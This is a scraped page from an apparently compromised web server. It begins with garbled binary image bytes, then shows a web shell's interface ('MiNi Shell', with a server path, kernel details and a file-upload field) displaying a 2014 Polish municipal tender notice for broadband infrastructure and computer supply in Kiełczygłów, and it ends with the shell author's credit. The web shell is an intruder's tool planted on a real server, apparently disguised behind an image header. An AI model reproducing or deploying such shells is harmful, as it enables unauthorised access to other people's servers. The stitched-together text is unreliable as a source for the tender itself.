JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140820/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140820/276290-N-2014.html

<p class="kh_header"><b>Kiełczygłów: Opracowanie  dokumentacji projektowej i budowę infrastruktury sieci szerokopasmowej, dostawę sprzętu komputerowego wraz z oprogramowaniem oraz szkolenie Beneficjentów w ramach projektu pn. Rozwój społeczeństwa informacyjnego poprzez przeciwdziałanie wykluczeniu cyfrowemu w Gminie Kiełczygłów realizowanego  przez  Gminę Kiełczygłów</b><br>
<b>Numer ogłoszenia: 276290 - 2014; data zamieszczenia: 20.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kiełczygłów , ul. Tysiąclecia 25, 98-358 Kiełczygłów, woj. łódzkie, tel. 0-43 8425022 w.35, 8425078, faks 0-43 8425022 w.21.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.kielczyglow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Samorządu Terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie  dokumentacji projektowej i budowę infrastruktury sieci szerokopasmowej, dostawę sprzętu komputerowego wraz z oprogramowaniem oraz szkolenie Beneficjentów w ramach projektu pn. Rozwój społeczeństwa informacyjnego poprzez przeciwdziałanie wykluczeniu cyfrowemu w Gminie Kiełczygłów realizowanego  przez  Gminę Kiełczygłów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest projekt i budowa sieci szerokopasmowej w technologii LTE lub punkt-wielopunkt w paśmie 6.4 GHz nazywany dalej PMP 6.4 GHz na terenie gminy Kiełczygłów, w tym między innymi:
- Wykonanie dokumentacji projektowej, pozyskanie niezbędnych pozwoleń oraz budowa sieci dostępowej w oparciu o system LTE lub punkt-wielopunkt w paśmie 6.4 GHz nazywany dalej PMP 6.4 GHz;
- Wykonanie dokumentacji projektowej, pozyskanie niezbędnych pozwoleń oraz budowa sieci szkieletowej i dystrybucyjnej w oparciu o system LTE lub PMP 6.4 GHz i radiolinie klasy operatorskiej;
- Przyłączenie do sieci 150 gospodarstw domowych Beneficjentów Ostatecznych za pomocą budowanej infrastruktury LTE lub PMP 6.4 GHz;
- Przyłączenie do sieci 12 Jednostek Podległych Gminie, w których zainstalowane zostaną dodatkowe komputery oraz wyposażenie ich w zewnętrzne hot-spoty WiFi;
- Budowa i dostawa wyposażenia Głównego Punktu Dystrybucyjnego sieci punktu styku sieci gminnej z Internetem i centrum realizacji usług sieciowych;
- Dostawa i instalacja 150 komputerów w gospodarstwach domowych Beneficjentów Ostatecznych wraz z ich podłączeniem do wybudowanej sieci i uruchomieniem na nich dostępu do sieci Internet;
- Dostawa i instalacja 81 komputerów w Jednostkach Podległych Gminie wraz z ich podłączeniem do wybudowanej sieci i uruchomieniem na nich dostępu do sieci Internet;
- Przeprowadzenie szkoleń  dla 375 Beneficjentów Ostatecznych z zakresu tematyki obsługi komputera i wykorzystywania sieci Internet;
- Przeprowadzenie wymaganych testów i badań funkcjonowania infrastruktury oraz przygotowanie dokumentów związanych z oddaniem Zamawiającemu przedmiotu prac w użytkowanie;
- Przyłącze do Internetu oraz świadczenie usługi dostępu do Internetu klasy operatorskiej, świadczenie usług serwisowych tj. administrowanie i zarządzanie wybudowaną infrastrukturą do dnia 31.12.2015 roku, w tym ponoszenie opłat licencyjnych do UKE..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 32.41.80.00-6, 30.20.00.00-1, 32.00.00.00-3, 32.40.00.00-7, 32.41.21.00-5, 32.42.00.00-3, 32.52.00.00-4, 32.57.10.00-6, 32.58.10.00-9, 44.41.22.00-1, 45.31.00.00-3, 45.31.23.30-9, 45.40.00.00-1, 48.00.00.00-8, 48.21.00.00-3, 48.80.00.00-6, 48.82.00.00-2, 50.30.00.00-8, 51.60.00.00-8, 72.00.00.00-5, 72.61.10.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości: 80.000,00 zł, przed upływem terminu składania ofert określonego w niniejszej SIWZ.
Wadium może być wnoszone w jednej lub w kilku następujących formach:
- pieniądzu;
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
- gwarancjach bankowych;
- gwarancjach ubezpieczeniowych;
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości Dz.U. z 2007r. Nr 42, poz. 275, z 2008r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz  z 2010r Nr 96, poz. 620
- Wadium wnoszone w pieniądzu należy wpłacić na rachunek bankowy nr 57 9264 0009 0010 0003 2000 0030 prowadzony w BS Rusiec O/Kiełczygłów  z dopiskiem: Wadium - Oznaczenie sprawy: ZP.271.3.2014.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie - wykonał co najmniej 1 zamówienie o wartości nie mniejszej niż 500 000,00 PLN brutto obejmujące:
a. wykonanie prac budowlanych wraz z dostawą  materiałów budowlanych niezbędnych dla budowy sieci szerokopasmowej pracującej w technologii bezprzewodowej w paśmie licencjonowanym lub nielicencjonowanym, zawierającej co najmniej 2 stacje bazowe WiMAX lub LTE;
b. wybudowanie przynajmniej 1 wieży lub masztu posadowionego na ziemi o H30m;
c. budowę dwóch masztów antenowych o H10m, wraz z elementami mocowania anten. 
2. Trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie - wykonał co najmniej 1 zamówienie o wartości nie mniejszej niż 1.600.000,00 PLN brutto obejmujące:
a. przynajmniej 100 przyłączonych bezprzewodowo klientów pracujących w paśmie nielicencjonowanym lub licencjonowanym;
b. dostawę urządzeń niezbędnych dla budowy sieci szerokopasmowej pracującej w technologii bezprzewodowej w paśmie licencjonowanym lub nielicencjonowanym, zawierającej co najmniej 2 stacje bazowe WiMAX lub LTE
c. dostawę przynajmniej 100 komputerów;
d. dostawę przynajmniej 12 sztuk zarządzalnych przełączników sieci LAN;
e. dostawę przynajmniej jednej bramy dostępu do Internetu posiadającej funkcjonalność firewalla;
f. dostawę i uruchomienie przynajmniej 1 radiolinii na pasmo licencjonowane;
g. dostawę i uruchomienie systemu do autentykacji i autoryzacji użytkowników sieci bezprzewodowej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje poniższymi osobami:
a. Lider zespołu posiada następujące kwalifikacje: wykształcenie wyższe, oraz co najmniej 3 lata doświadczenia zawodowego dotyczącego zarządzania realizacją przedsięwzięć teleinformatycznych o wartości nie mniejszej niż 3.000.000 PLN brutto.
b. Ekspert ds. zarządzania projektem - przynajmniej dwiema osobami, które mogą potwierdzić swoje kwalifikacje certyfikatami dokumentującymi doświadczenie i wiedzę w zarządzaniu projektami.
c. Inżynier planowania radiowego - co najmniej jedna osoba, która posiada certyfikat producenta zaoferowanego oprogramowania do planowania radiowego, posiada 3 lata doświadczenia zawodowego w użytkowaniu w/w oprogramowania a dodatkowo w okresie ostatnich 3 lat przed upływem terminu składania ofert uczestniczyła w realizacji przynajmniej 3 projektów planowania radiowego o wartości min. 7.000 zł brutto każdy, w których zaplanowano przynajmniej 5 Stacji Bazowych jakiegokolwiek systemu punkt-wielopunkt wykorzystując w/w oprogramowanie.
d. Projektant konstrukcji wsporczych - co najmniej jedna osoba posiadająca uprawnienia budowlane do projektowania w specjalności konstrukcyjnej, a dodatkowo w okresie ostatnich 5 lat przed upływem terminu składania ofert zaprojektowała min. 2 konstrukcji typu wieża, maszt o H30m.
e. Kierownik budowy konstrukcji wsporczych - co najmniej jedna osoba, która posiada uprawnienia budowlane do kierowania budową w specjalności konstrukcyjnej, a dodatkowo w okresie ostatnich 5 lat przed upływem terminu składania ofert zarządzała min. 2 budowami wież, masztów o H30m.
f. Projektant masztów aluminiowych - co najmniej jedna osoba, która posiada uprawnienia budowlane do projektowania w specjalności konstrukcyjnej, a dodatkowo w okresie ostatnich 5 lat przed upływem terminu składania ofert zaprojektowała min. 2 masztów aluminiowych H10m.
g. Kierownik budowy masztów aluminiowych - co najmniej jedna osoba, która posiada uprawnienia budowlane do projektowania w specjalności konstrukcyjnej, a dodatkowo w okresie ostatnich 5 lat przed upływem terminu składania ofert kierowała min. 3 budowami masztów aluminiowych H10m.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Lider zespołu posiada następujące kwalifikacje: wykształcenie wyższe, oraz co najmniej 3 lata doświadczenia zawodowego dotyczącego zarządzania realizacją przedsięwzięć teleinformatycznych o wartości nie mniejszej niż 3.000.000 PLN brutto.
- Ekspert ds. zarządzania projektem - przynajmniej dwiema osobami, które mogą potwierdzić swoje kwalifikacje certyfikatami dokumentującymi doświadczenie i wiedzę w zarządzaniu projektami.
- Inżynier planowania radiowego - co najmniej jedna osoba, która posiada certyfikat producenta zaoferowanego oprogramowania do planowania radiowego, posiada 3 lata doświadczenia zawodowego w użytkowaniu w.w oprogramowania a dodatkowo w okresie ostatnich 3 lat przed upływem terminu składania ofert uczestniczyła w realizacji przynajmniej 3 projektów planowania radiowego o wartości min. 7.000 zł brutto każdy, w których zaplanowano przynajmniej 5 Stacji Bazowych jakiegokolwiek systemu punkt-wielopunkt wykorzystując w/w oprogramowanie.
- Projektant konstrukcji wsporczych - co najmniej jedna osoba posiadająca uprawnienia budowlane do projektowania w specjalności konstrukcyjnej, a dodatkowo w okresie ostatnich 5 lat przed upływem terminu składania ofert zaprojektowała min. 2 konstrukcji typu wieża, maszt o H30m.
- Kierownik budowy konstrukcji wsporczych - co najmniej jedna osoba, która posiada uprawnienia budowlane do kierowania budową w specjalności konstrukcyjnej, a dodatkowo w okresie ostatnich 5 lat przed upływem terminu składania ofert zarządzała min. 2 budowami wież, masztów o H30m.
- Projektant masztów aluminiowych - co najmniej jedna osoba, która posiada uprawnienia budowlane do projektowania w specjalności konstrukcyjnej, a dodatkowo w okresie ostatnich 5 lat przed upływem terminu składania ofert zaprojektowała min. 2 masztów aluminiowych H10m.
- Kierownik budowy masztów aluminiowych - co najmniej jedna osoba, która posiada uprawnienia budowlane do projektowania w specjalności konstrukcyjnej, a dodatkowo w okresie ostatnich 5 lat przed upływem terminu składania ofert kierowała min. 3 budowami masztów aluminiowych H10m.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże, że:
a. posiada środki finansowe lub zdolność kredytową na kwotę minimum 1.500.000,00 zł,
b. posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min. 1.500.000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>5.	Zamawiający dopuszcza zmianę postanowień Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następujących przypadkach i na określonych warunkach:
a. dopuszczalna jest zmiana technologii budowy gminnej infrastruktury dostępu do internetu w przypadku braku możliwości zastosowania technologii wskazanej przez Zamawiającego w opisie przedmiotu Umowy,
b. dopuszczalna jest zmiana technologii budowy gminnej infrastruktury dostępu do internetu w przypadku zastosowania rozwiązań nowocześniejszych wynikających z postępu technicznego, spełniających wymagania określone w przedmiocie Umowy,
c. dopuszczalne jest wydłużenie terminu wykonania Umowy z powodu siły wyższej albo z powodu okoliczności, za które wyłączną winę ponosi Zamawiający lub osoba trzecia, za której działania albo zaniechanie żadna ze stron nie odpowiada,
d. dopuszczalna jest zmiana Umowy polegająca na zmianie danych Wykonawcy bez zmian samego Wykonawcy np. zmiana siedziby, adresu, nazwy,
e. dopuszczalna jest zmiana przedstawicieli Stron Umowy pod warunkiem wykazania, że nowe osoby spełniają warunki określone w §16 umowy,
f. dopuszczalna jest zmiana zakresu robót budowlanych wykonywanych przez podwykonawców w przypadku ich zmiany po uzyskaniu zgody zamawiającego na powyższą zmianę,
g. dopuszczalny jest podział przedmiotu Umowy na większą liczbę zadań z odpowiednim podziałem wynagrodzenia w przypadku przedstawienia przez Wykonawcę harmonogramu zgodnie z §3 ust 2 umowy,
h. dopuszczalna jest zmiana wynagrodzenia w przypadku zmiany przez ustawodawcę, w trakcie realizacji przedmiotu Umowy, stawek procentowych podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.kielczyglow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Kiełczygłów
ul. Tysiąclecia 25
98-358 Kiełczygłów
pokój Nr 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.09.2014 godzina 09:00, miejsce: Gmina Kiełczygłów
ul. Tysiąclecia 25
98-358 Kiełczygłów
Pokój Nr 12 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Europejskiego Funduszu Rozwoju
Regionalnego w ramach Programu Operacyjnego Innowacyjna Gospodarka
Dotacje na Innowacje   Inwestujemy w Waszą przyszłość.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com